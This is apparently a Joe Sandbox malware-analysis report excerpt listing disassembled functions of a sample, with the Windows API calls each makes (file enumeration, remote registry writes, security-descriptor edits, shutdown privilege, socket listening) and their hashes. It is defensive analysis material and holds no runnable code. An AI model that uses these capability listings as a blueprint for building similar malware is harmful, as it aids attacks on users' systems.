                          • Opcode Fuzzy Hash: 1a7a23701d2639a84f0a59299f0256c3f87d5dc85c2f7ad6afe0d00289b56e1e
                          • Instruction Fuzzy Hash: 0BA14BB1404205ABD714EFA4D98ADAFBBECFFD5700F40491DF59582191EB30EA49CBA2
                          Function 0057F445 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0057F466
                          • _wcscmp.LIBCMT ref: 0057F47B
                          • _wcscmp.LIBCMT ref: 0057F492
                          • GetFileAttributesW.KERNEL32(?), ref: 0057F4A4
                          • SetFileAttributesW.KERNEL32(?,?), ref: 0057F4BE
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0057F4D6
                          • FindClose.KERNEL32(00000000), ref: 0057F4E1
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0057F4FD
                          • _wcscmp.LIBCMT ref: 0057F524
                          • _wcscmp.LIBCMT ref: 0057F53B
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0057F54D
                          • SetCurrentDirectoryW.KERNEL32(005C98F8), ref: 0057F56B
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057F575
                          • FindClose.KERNEL32(00000000), ref: 0057F582
                          • FindClose.KERNEL32(00000000), ref: 0057F594
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1803514871-438819550
                          • Opcode ID: 8219bf89190ee17adb3c7b90d468c525d46d2c09adb48040cdb1a9f6e316a21d
                          • Instruction ID: bf69cf341e3bf7ae95f81b96e040cf2cb8b37ea0c548f38ec5e35f3b0707baa6
                          • Opcode Fuzzy Hash: 8219bf89190ee17adb3c7b90d468c525d46d2c09adb48040cdb1a9f6e316a21d
                          • Instruction Fuzzy Hash: 83317F355013196FDB20DFA4EC4DADE7BACBF5A320F104166F819E3190EB34DA44AB64
                          Function 00590C7F Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00590D7B
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,005A0980,00000000,?,00000000,?,?), ref: 00590DE9
                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00590E31
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00590EBA
                          • RegCloseKey.ADVAPI32(?), ref: 005911DA
                          • RegCloseKey.ADVAPI32(00000000), ref: 005911E7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Close$ConnectCreateRegistryValue
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 536824911-966354055
                          • Opcode ID: de3073bb341c5a2b0f93924460eff82ba65e24d9e81c6be746c65e172c7a9883
                          • Instruction ID: bac5937ff80f85a70859bf40435a2af44d1042a4b87d15dbf0edfb99552f5494
                          • Opcode Fuzzy Hash: de3073bb341c5a2b0f93924460eff82ba65e24d9e81c6be746c65e172c7a9883
                          • Instruction Fuzzy Hash: D3028075200A129FDB14DF14D859E6ABBE5FF89314F04895DF84A9B3A2CB30ED41CB81
                          Function 0057F5A2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0057F5C3
                          • _wcscmp.LIBCMT ref: 0057F5D8
                          • _wcscmp.LIBCMT ref: 0057F5EF
                            • Part of subcall function 005746E2: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005746FD
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0057F61E
                          • FindClose.KERNEL32(00000000), ref: 0057F629
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0057F645
                          • _wcscmp.LIBCMT ref: 0057F66C
                          • _wcscmp.LIBCMT ref: 0057F683
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0057F695
                          • SetCurrentDirectoryW.KERNEL32(005C98F8), ref: 0057F6B3
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057F6BD
                          • FindClose.KERNEL32(00000000), ref: 0057F6CA
                          • FindClose.KERNEL32(00000000), ref: 0057F6DC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 1824444939-438819550
                          • Opcode ID: 9993ebe3c640a68a64c7bbf1cc7566474ca6b891430ee32e808354825387e083
                          • Instruction ID: e6852627da863673c4520a06dfb2d60db17e3de8513b14a0a26aa43fde9308be
                          • Opcode Fuzzy Hash: 9993ebe3c640a68a64c7bbf1cc7566474ca6b891430ee32e808354825387e083
                          • Instruction Fuzzy Hash: D931D33650021A6EDF20DFA4EC4DADE7FACBF56324F104165E819A31E1DB319E44EB64
                          Function 0057E0CA Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 0057E18C
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0057E19C
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0057E1A8
                          • __wsplitpath.LIBCMT ref: 0057E206
                          • _wcscat.LIBCMT ref: 0057E21E
                          • _wcscat.LIBCMT ref: 0057E230
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0057E245
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0057E259
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0057E28B
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0057E2AC
                          • _wcscpy.LIBCMT ref: 0057E2B8
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0057E2F7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                          • String ID: *.*
                          • API String ID: 3566783562-438819550
                          • Opcode ID: 3b85a9f8d728a23cc5a166fd4788d5822d6cac6e7d8dcd6a30ba054a3e41fc6b
                          • Instruction ID: 5f15ce53ff8147f80d5d1683265e6bb655d5762f18dcc465d27b13bd457197de
                          • Opcode Fuzzy Hash: 3b85a9f8d728a23cc5a166fd4788d5822d6cac6e7d8dcd6a30ba054a3e41fc6b
                          • Instruction Fuzzy Hash: 4D619B755047029FDB10EF60D88A99EBBE8FF89310F04895DF88983251EB31E945CB92
                          Function 005686B0 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00568C03: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00568C1F
                            • Part of subcall function 00568C03: GetLastError.KERNEL32(?,005686E3,?,?,?), ref: 00568C29
                            • Part of subcall function 00568C03: GetProcessHeap.KERNEL32(00000008,?,?,005686E3,?,?,?), ref: 00568C38
                            • Part of subcall function 00568C03: HeapAlloc.KERNEL32(00000000,?,005686E3,?,?,?), ref: 00568C3F
                            • Part of subcall function 00568C03: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568C56
                            • Part of subcall function 00568CA0: GetProcessHeap.KERNEL32(00000008,005686F9,00000000,00000000,?,005686F9,?), ref: 00568CAC
                            • Part of subcall function 00568CA0: HeapAlloc.KERNEL32(00000000,?,005686F9,?), ref: 00568CB3
                            • Part of subcall function 00568CA0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,005686F9,?), ref: 00568CC4
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00568714
                          • _memset.LIBCMT ref: 00568729
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00568748
                          • GetLengthSid.ADVAPI32(?), ref: 00568759
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00568796
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005687B2
                          • GetLengthSid.ADVAPI32(?), ref: 005687CF
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005687DE
                          • HeapAlloc.KERNEL32(00000000), ref: 005687E5
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00568806
                          • CopySid.ADVAPI32(00000000), ref: 0056880D
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0056883E
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00568864
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00568878
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 3996160137-0
                          • Opcode ID: ea01dede8fbd5d3fd877cfad86af1f6d80dc3c5e213e0a443e0062538d8af699
                          • Instruction ID: 5cc6675649ce18480670f117e7bf19aea9613f1c83e479e9d79b2a2279d72f3e
                          • Opcode Fuzzy Hash: ea01dede8fbd5d3fd877cfad86af1f6d80dc3c5e213e0a443e0062538d8af699
                          • Instruction Fuzzy Hash: 136158B190020AAFDF54DFA4DC48EFEBB79FF45304F448629E915A7290DB319A04DB60
                          Function 00590802 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00591242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005901D5,?,?), ref: 00591259
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005908D4
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00590973
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00590A0B
                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00590C4A
                          • RegCloseKey.ADVAPI32(00000000), ref: 00590C57
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                          • String ID:
                          • API String ID: 1240663315-0
                          • Opcode ID: a43295efaeb35fd82448ffd0340fe323a1c52981bebe24331f72ef2c646479ba
                          • Instruction ID: a6d646a260e3e18a1dbcb2ae19362be41fa1ab061c3b3adee77e5efd05e89fa1
                          • Opcode Fuzzy Hash: a43295efaeb35fd82448ffd0340fe323a1c52981bebe24331f72ef2c646479ba
                          • Instruction Fuzzy Hash: 3DE17D71204211AFCB14DF28D895E2BBBE9FF89314F04996DF44AD72A1DA30ED01CB91
                          Function 005742AA Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                          Download Yara Rule
                          APIs
                          • __swprintf.LIBCMT ref: 005742BE
                          • __swprintf.LIBCMT ref: 005742CB
                            • Part of subcall function 005337FA: __woutput_l.LIBCMT ref: 00533853
                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 005742F5
                          • LoadResource.KERNEL32(?,00000000), ref: 00574301
                          • LockResource.KERNEL32(00000000), ref: 0057430E
                          • FindResourceW.KERNEL32(?,?,00000003), ref: 0057432E
                          • LoadResource.KERNEL32(?,00000000), ref: 00574340
                          • SizeofResource.KERNEL32(?,00000000), ref: 0057434F
                          • LockResource.KERNEL32(?), ref: 0057435B
                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 005743BC
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                          • String ID:
                          • API String ID: 1433390588-0
                          • Opcode ID: f79a4e5c1267a152cd30da8f0b83fbf3901ebdb5b05e368a3ed516b0aea19cba
                          • Instruction ID: baba1e1884f8d4fc16bf298073bc6ead3c8b5a7db921ddd4ba0fd6d496870cf9
                          • Opcode Fuzzy Hash: f79a4e5c1267a152cd30da8f0b83fbf3901ebdb5b05e368a3ed516b0aea19cba
                          • Instruction Fuzzy Hash: E331607560521AABDB119F60ED88ABB7FACFF09301F008816F90AD6191E730D955EEB1
                          Function 00584614 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:
                          • API String ID: 1737998785-0
                          • Opcode ID: 456c64be65acef22c9c49a6629e76c2476fdd31480cf9d51c7c1944c516d8111
                          • Instruction ID: a419fbc5a4f6ef550d0d6fd5414e0251ab506f06f1871daa203eb5cb4583ad28
                          • Opcode Fuzzy Hash: 456c64be65acef22c9c49a6629e76c2476fdd31480cf9d51c7c1944c516d8111
                          • Instruction Fuzzy Hash: 9721E5352012129FDB11AF11EC0DB6D7FA8FF96724F008019FC069B2A1DB70AC019F94
                          Function 0057F8A3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0057F8F0
                          • FindClose.KERNEL32(00000000), ref: 0057FA03
                            • Part of subcall function 005152B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005152E6
                          • Sleep.KERNEL32(0000000A), ref: 0057F920
                          • _wcscmp.LIBCMT ref: 0057F934
                          • _wcscmp.LIBCMT ref: 0057F94F
                          • FindNextFileW.KERNEL32(?,?), ref: 0057F9ED
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                          • String ID: *.*
                          • API String ID: 2185952417-438819550
                          • Opcode ID: 6bcd34aa0320f1d7d05d99af0906bba98e0a7d33107d28e507d0f386d0fe377c
                          • Instruction ID: 855b74576cf790f8a621c1da8d5a5f296a6d0ce9fad86a55662bc4613b756652
                          • Opcode Fuzzy Hash: 6bcd34aa0320f1d7d05d99af0906bba98e0a7d33107d28e507d0f386d0fe377c
                          • Instruction Fuzzy Hash: 0C416D7190021AAFCF14DF64DC49BEEBFB4FF55310F148166E919A2291EB309E84DB90
                          Function 005755E5 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0056917C: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005691C6
                            • Part of subcall function 0056917C: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005691F3
                            • Part of subcall function 0056917C: GetLastError.KERNEL32 ref: 00569200
                          • ExitWindowsEx.USER32(?,00000000), ref: 00575621
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                          • String ID: $@$SeShutdownPrivilege
                          • API String ID: 2234035333-194228
                          • Opcode ID: 22002045e7a92876fc53d273d4d71a936eff5dd8736f83b12b5af2792a06955a
                          • Instruction ID: 666f5a44cf3010a2e6136b800d75a5d7e78259c3453f058e53e1ba5d696a4e07
                          • Opcode Fuzzy Hash: 22002045e7a92876fc53d273d4d71a936eff5dd8736f83b12b5af2792a06955a
                          • Instruction Fuzzy Hash: 6C017B716906122BFB285664BC4EFBA7E5CFB05341F904424F90FD20D2F9E09C04B591
                          Function 00586733 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                          Download Yara Rule
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 0058678C
                          • WSAGetLastError.WSOCK32(00000000), ref: 0058679B
                          • bind.WSOCK32(00000000,?,00000010), ref: 005867B7
                          • listen.WSOCK32(00000000,00000005), ref: 005867C6
                          • WSAGetLastError.WSOCK32(00000000), ref: 005867E0
                          • closesocket.WSOCK32(00000000,00000000), ref: 005867F4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorLast$bindclosesocketlistensocket
                          • String ID:
                          • API String ID: 1279440585-0
                          • Opcode ID: 25fe16cc43d7e155ab15551e5be4841c705868c30328db898562f11d1dcc2823
                          • Instruction ID: 851bd46eecf802147c7a47a38a5dcf8e57a673dcd64942a60004cefb13b32878
                          • Opcode Fuzzy Hash: 25fe16cc43d7e155ab15551e5be4841c705868c30328db898562f11d1dcc2823
                          • Instruction Fuzzy Hash: 1B21D070200602AFDB10EF64D889B6EBBA9FF89724F108558E816E73D1CB30AC45DB91
                          Function 00511663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00511DD6
                          • GetSysColor.USER32(0000000F), ref: 00511E2A
                          • SetBkColor.GDI32(?,00000000), ref: 00511E3D
                            • Part of subcall function 0051166C: DefDlgProcW.USER32(?,00000020,?), ref: 005116B4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ColorProc$LongWindow
                          • String ID:
                          • API String ID: 3744519093-0
                          • Opcode ID: 88dedd9ddbd239bad7833e7b9c88eb1dda43164e595130cfa074fc0e438d59f3
                          • Instruction ID: edf33b420b239b2b614f200b89db0066e997560a33643b648b5875205680737b
                          • Opcode Fuzzy Hash: 88dedd9ddbd239bad7833e7b9c88eb1dda43164e595130cfa074fc0e438d59f3
                          • Instruction Fuzzy Hash: 64A149B4106C06BAFA386B696C89EFB3D5DFF81345F14094AF602C61C1DA24DCC1927E
                          Function 0057C16C Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 0057C196
                          • _wcscmp.LIBCMT ref: 0057C1C6
                          • _wcscmp.LIBCMT ref: 0057C1DB
                          • FindNextFileW.KERNEL32(00000000,?), ref: 0057C1EC
                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0057C21C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Find$File_wcscmp$CloseFirstNext
                          • String ID:
                          • API String ID: 2387731787-0
                          • Opcode ID: d1e0c777a7a1f3f5926c2b5451ca2f8a048906586f6bfff4232b70d41376eaaa
                          • Instruction ID: 262d1a8d7b023e4a72a7ff65901fd172bfd7e4392696a3333ab1933e4050f6a4
                          • Opcode Fuzzy Hash: d1e0c777a7a1f3f5926c2b5451ca2f8a048906586f6bfff4232b70d41376eaaa
                          • Instruction Fuzzy Hash: 2951B0796046029FD714DF68E494E9ABBE4FF8A310F10851DF95A87392DB30ED04DB91
                          Function 00586BF7 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0058823D: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00588268
                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00586C4E
                          • WSAGetLastError.WSOCK32(00000000), ref: 00586C77
                          • bind.WSOCK32(00000000,?,00000010), ref: 00586CB0
                          • WSAGetLastError.WSOCK32(00000000), ref: 00586CBD
                          • closesocket.WSOCK32(00000000,00000000), ref: 00586CD1
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
